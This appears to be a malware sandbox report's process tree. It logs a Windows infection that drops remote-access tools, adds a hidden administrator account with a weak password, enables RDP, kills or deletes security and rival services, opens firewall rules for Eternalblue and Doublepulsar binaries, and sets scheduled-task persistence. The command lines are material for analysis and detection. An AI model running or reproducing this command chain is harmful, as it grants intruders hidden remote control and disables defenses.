    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        5⤵
        Delays execution with timeout.exe
        
        PID:6208
    - - C:\ProgramData\Windows\rutserv.exe
        
        rutserv.exe /silentinstall
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1644
    - - C:\ProgramData\Windows\rutserv.exe
        
        rutserv.exe /firewall
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:992
    - - C:\ProgramData\Windows\rutserv.exe
        
        rutserv.exe /start
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:468
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S C:\Programdata\Windows\*.*
        5⤵
        Views/modifies file attributes
        
        PID:7344
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S C:\Programdata\Windows
        5⤵
        System Location Discovery: System Language Discovery
        Views/modifies file attributes
        
        PID:4184
    - - C:\Windows\SysWOW64\sc.exe
        
        sc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/1000
        5⤵
        Launches sc.exe
        
        PID:7556
    - - C:\Windows\SysWOW64\sc.exe
        
        sc config RManService obj= LocalSystem type= interact type= own
        5⤵
        Launches sc.exe
        
        PID:2140
    - - C:\Windows\SysWOW64\sc.exe
        
        sc config RManService DisplayName= "Microsoft Framework"
        5⤵
        Launches sc.exe
        
        PID:7084
- - C:\ProgramData\Windows\winit.exe
    "C:\ProgramData\Windows\winit.exe"
    3⤵
    - Executes dropped EXE
    - Checks processor information in registry
    PID:1952
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat
      4⤵
      PID:4344
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 5
        5⤵
        Delays execution with timeout.exe
        
        PID:2744
- C:\programdata\install\cheat.exe
  C:\programdata\install\cheat.exe -pnaxui
  2⤵
  - Executes dropped EXE
  PID:7392
- - C:\ProgramData\Microsoft\Intel\taskhost.exe
    "C:\ProgramData\Microsoft\Intel\taskhost.exe"
    3⤵
    - Executes dropped EXE
    PID:4264
  - - C:\programdata\microsoft\intel\P.exe
      C:\programdata\microsoft\intel\P.exe
      4⤵
      Executes dropped EXE
      PID:1004
  - - C:\programdata\microsoft\intel\R8.exe
      C:\programdata\microsoft\intel\R8.exe
      4⤵
      Executes dropped EXE
      PID:5568
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"
        5⤵
        
        PID:1704
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "
        6⤵
        
        PID:6008
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im Rar.exe
        7⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:7704
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im Rar.exe
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2212
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        7⤵
        Delays execution with timeout.exe
        
        PID:4688
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        7⤵
        
        PID:3324
        
        C:\rdp\Rar.exe
        
        "Rar.exe" e -p555 db.rar
        7⤵
        Executes dropped EXE
        
        PID:4028
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im Rar.exe
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:7796
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        7⤵
        Delays execution with timeout.exe
        
        PID:3832
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"
        7⤵
        
        PID:2212
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\rdp\bat.bat" "
        8⤵
        
        PID:5432
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
        9⤵
        
        PID:1416
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f
        9⤵
        
        PID:1784
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
        9⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:4972
        
        C:\Windows\SysWOW64\net.exe
        
        net.exe user "john" "12345" /add
        9⤵
        
        PID:4344
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 user "john" "12345" /add
        10⤵
        System Location Discovery: System Language Discovery
        
        PID:992
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        9⤵
        
        PID:564
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Администраторы" "John" /add
        9⤵
        
        PID:6460
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Администраторы" "John" /add
        10⤵
        
        PID:5600
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Administratorzy" "John" /add
        9⤵
        
        PID:2900
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Administratorzy" "John" /add
        10⤵
        System Location Discovery: System Language Discovery
        
        PID:1132
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Administrators" John /add
        9⤵
        
        PID:7440
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Administrators" John /add
        10⤵
        
        PID:2636
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Administradores" John /add
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:8116
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Administradores" John /add
        10⤵
        System Location Discovery: System Language Discovery
        
        PID:6612
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Пользователи удаленного рабочего стола" John /add
        9⤵
        
        PID:6340
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add
        10⤵
        
        PID:1856
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Пользователи удаленного управления" John /add
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:1560
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add
        10⤵
        System Location Discovery: System Language Discovery
        
        PID:1668
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Remote Desktop Users" John /add
        9⤵
        Remote Service Session Hijacking: RDP Hijacking
        
        PID:7740
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add
        10⤵
        Remote Service Session Hijacking: RDP Hijacking
        
        PID:7792
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Usuarios de escritorio remoto" John /add
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:7528
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add
        10⤵
        System Location Discovery: System Language Discovery
        
        PID:1452
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Uzytkownicy pulpitu zdalnego" John /add
        9⤵
        
        PID:4184
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add
        10⤵
        
        PID:900
        
        C:\rdp\RDPWInst.exe
        
        "RDPWInst.exe" -i -o
        9⤵
        Server Software Component: Terminal Services DLL
        Executes dropped EXE
        Modifies WinLogon
        Drops file in System32 directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:1964
        
        C:\Windows\SYSTEM32\netsh.exe
        
        netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
        10⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:7632
        
        C:\rdp\RDPWInst.exe
        
        "RDPWInst.exe" -w
        9⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2740
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f
        9⤵
        Hide Artifacts: Hidden Users
        
        PID:3732
        
        C:\Windows\SysWOW64\net.exe
        
        net accounts /maxpwage:unlimited
        9⤵
        
        PID:6696
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 accounts /maxpwage:unlimited
        10⤵
        
        PID:7208
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +s +h "C:\Program Files\RDP Wrapper\*.*"
        9⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:7424
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +s +h "C:\Program Files\RDP Wrapper"
        9⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:1764
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +s +h "C:\rdp"
        9⤵
        Sets file to hidden
        System Location Discovery: System Language Discovery
        Views/modifies file attributes
        
        PID:2928
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        7⤵
        Delays execution with timeout.exe
        
        PID:6548
  - - C:\ProgramData\Microsoft\Intel\winlog.exe
      C:\ProgramData\Microsoft\Intel\winlog.exe -p123
      4⤵
      Executes dropped EXE
      PID:6988
    - - C:\ProgramData\Microsoft\Intel\winlogon.exe
        
        "C:\ProgramData\Microsoft\Intel\winlogon.exe"
        5⤵
        Executes dropped EXE
        
        PID:1220
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9725.tmp\9726.bat C:\ProgramData\Microsoft\Intel\winlogon.exe"
        6⤵
        
        PID:6672
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell.exe -command "Import-Module applocker" ; "Set-AppLockerPolicy -XMLPolicy C:\ProgramData\microsoft\Temp\5.xml"
        7⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:1004
  - - C:\Programdata\RealtekHD\taskhostw.exe
      C:\Programdata\RealtekHD\taskhostw.exe
      4⤵
      Modifies visiblity of hidden/system files in Explorer
      Executes dropped EXE
      Adds Run key to start application
      NTFS ADS
      Suspicious behavior: GetForegroundWindowSpam
      PID:2976
    - - C:\Programdata\WindowsTask\winlogon.exe
        
        C:\Programdata\WindowsTask\winlogon.exe
        5⤵
        Executes dropped EXE
        
        PID:6324
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /C schtasks /query /fo list
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1668
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:1452
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /query /fo list
        7⤵
        
        PID:6588
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /C schtasks /Delete /TN "OneDrive Reporting Task-S-1-5-21-2287204051-441334380-1151193565-1000" /F
        6⤵
        Indicator Removal: Clear Persistence
        
        PID:6460
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Delete /TN "OneDrive Reporting Task-S-1-5-21-2287204051-441334380-1151193565-1000" /F
        7⤵
        
        PID:3948
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /C schtasks /Delete /TN "OneDrive Standalone Update Task-S-1-5-21-2287204051-441334380-1151193565-1000" /F
        6⤵
        Indicator Removal: Clear Persistence
        
        PID:4184
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Delete /TN "OneDrive Standalone Update Task-S-1-5-21-2287204051-441334380-1151193565-1000" /F
        7⤵
        
        PID:5292
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ipconfig /flushdns
        5⤵
        
        PID:5388
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:6016
      - C:\Windows\system32\ipconfig.exe
        
        ipconfig /flushdns
        6⤵
        Gathers network information
        
        PID:4712
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c gpupdate /force
        5⤵
        
        PID:3476
      - C:\Windows\system32\gpupdate.exe
        
        gpupdate /force
        6⤵
        
        PID:5840
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 1
      4⤵
      System Location Discovery: System Language Discovery
      Scheduled Task/Job: Scheduled Task
      PID:4184
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
      4⤵
      System Location Discovery: System Language Discovery
      Scheduled Task/Job: Scheduled Task
      PID:4972
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.bat
      4⤵
      Drops file in Drivers directory
      PID:5700
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:4572
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\Temp.bat
      4⤵
      System Location Discovery: System Language Discovery
      PID:7376
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:992
    - - C:\Windows\SysWOW64\timeout.exe
        
        TIMEOUT /T 5 /NOBREAK
        5⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:7324
    - - C:\Windows\SysWOW64\timeout.exe
        
        TIMEOUT /T 3 /NOBREAK
        5⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:8116
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /IM 1.exe /T /F
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5820
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /IM P.exe /T /F
        5⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:7004
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S C:\Programdata\Windows
        5⤵
        Views/modifies file attributes
        
        PID:980
- C:\programdata\install\ink.exe
  C:\programdata\install\ink.exe
  2⤵
  - Executes dropped EXE
  PID:6484
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc start appidsvc
  2⤵
  PID:6336
- - C:\Windows\SysWOW64\sc.exe
    sc start appidsvc
    3⤵
    - Launches sc.exe
    PID:3056
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc start appmgmt
  2⤵
  - System Location Discovery: System Language Discovery
  PID:7208
- - C:\Windows\SysWOW64\sc.exe
    sc start appmgmt
    3⤵
    - Launches sc.exe
    PID:6948
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto
  2⤵
  PID:2068
- - C:\Windows\SysWOW64\sc.exe
    sc config appidsvc start= auto
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:468
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto
  2⤵
  PID:240
- - C:\Windows\SysWOW64\sc.exe
    sc config appmgmt start= auto
    3⤵
    - Launches sc.exe
    PID:2660
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete swprv
  2⤵
  PID:4392
- - C:\Windows\SysWOW64\sc.exe
    sc delete swprv
    3⤵
    - Launches sc.exe
    PID:7300
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop mbamservice
  2⤵
  PID:4716
- - C:\Windows\SysWOW64\sc.exe
    sc stop mbamservice
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:664
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop bytefenceservice
  2⤵
  PID:4484
- - C:\Windows\SysWOW64\sc.exe
    sc stop bytefenceservice
    3⤵
    - Launches sc.exe
    PID:5904
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete bytefenceservice
  2⤵
  - System Location Discovery: System Language Discovery
  PID:6508
- - C:\Windows\SysWOW64\sc.exe
    sc delete bytefenceservice
    3⤵
    - Launches sc.exe
    PID:6280
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete mbamservice
  2⤵
  PID:1996
- - C:\Windows\SysWOW64\sc.exe
    sc delete mbamservice
    3⤵
    - Launches sc.exe
    PID:3704
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete crmsvc
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1652
- - C:\Windows\SysWOW64\sc.exe
    sc delete crmsvc
    3⤵
    - Launches sc.exe
    PID:6948
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete "windows node"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4828
- - C:\Windows\SysWOW64\sc.exe
    sc delete "windows node"
    3⤵
    - Launches sc.exe
    PID:7712
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop Adobeflashplayer
  2⤵
  - System Location Discovery: System Language Discovery
  PID:240
- - C:\Windows\SysWOW64\sc.exe
    sc stop Adobeflashplayer
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:7884
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete AdobeFlashPlayer
  2⤵
  - System Location Discovery: System Language Discovery
  PID:7968
- - C:\Windows\SysWOW64\sc.exe
    sc delete AdobeFlashPlayer
    3⤵
    - Launches sc.exe
    PID:6096
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop MoonTitle
  2⤵
  PID:7080
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:664
- - C:\Windows\SysWOW64\sc.exe
    sc stop MoonTitle
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:4184
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete MoonTitle"
  2⤵
  PID:5392
- - C:\Windows\SysWOW64\sc.exe
    sc delete MoonTitle"
    3⤵
    - Launches sc.exe
    PID:900
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop AudioServer
  2⤵
  PID:1220
- - C:\Windows\SysWOW64\sc.exe
    sc stop AudioServer
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:5432
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete AudioServer"
  2⤵
  PID:6336
- - C:\Windows\SysWOW64\sc.exe
    sc delete AudioServer"
    3⤵
    - Launches sc.exe
    PID:4660
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop clr_optimization_v4.0.30318_64
  2⤵
  - System Location Discovery: System Language Discovery
  PID:6608
- - C:\Windows\SysWOW64\sc.exe
    sc stop clr_optimization_v4.0.30318_64
    3⤵
    - Launches sc.exe
    PID:2792
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete clr_optimization_v4.0.30318_64"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4828
- - C:\Windows\SysWOW64\sc.exe
    sc delete clr_optimization_v4.0.30318_64"
    3⤵
    - Launches sc.exe
    PID:7724
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop MicrosoftMysql
  2⤵
  PID:2660
- - C:\Windows\SysWOW64\sc.exe
    sc stop MicrosoftMysql
    3⤵
    - Launches sc.exe
    PID:3476
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete MicrosoftMysql
  2⤵
  PID:6016
- - C:\Windows\SysWOW64\sc.exe
    sc delete MicrosoftMysql
    3⤵
    - Launches sc.exe
    PID:4972
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on
  2⤵
  PID:7424
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall set allprofiles state on
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:7400
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
  2⤵
  PID:4084
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:5024
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
  2⤵
  PID:992
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:1652
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
  2⤵
  PID:1764
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:4868
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
  2⤵
  PID:6672
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:2068
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
  2⤵
  PID:2744
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:8168
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
  2⤵
  PID:564
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:5432
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
  2⤵
  PID:5704
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:5260
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
  2⤵
  PID:2268
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:6696
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
  2⤵
  PID:5048
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:6484
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
  2⤵
  PID:4112
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:6252
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5620
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:6552
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2140
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:7340
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
  2⤵
  PID:2636
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:6892
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
  2⤵
  PID:8012
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:5260
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
  2⤵
  PID:4712
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:1364
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
  2⤵
  - System Location Discovery: System Language Discovery
  PID:7716
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:4344
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
  2⤵
  PID:3932
- - C:\Windows\SysWOW64\netsh.exe
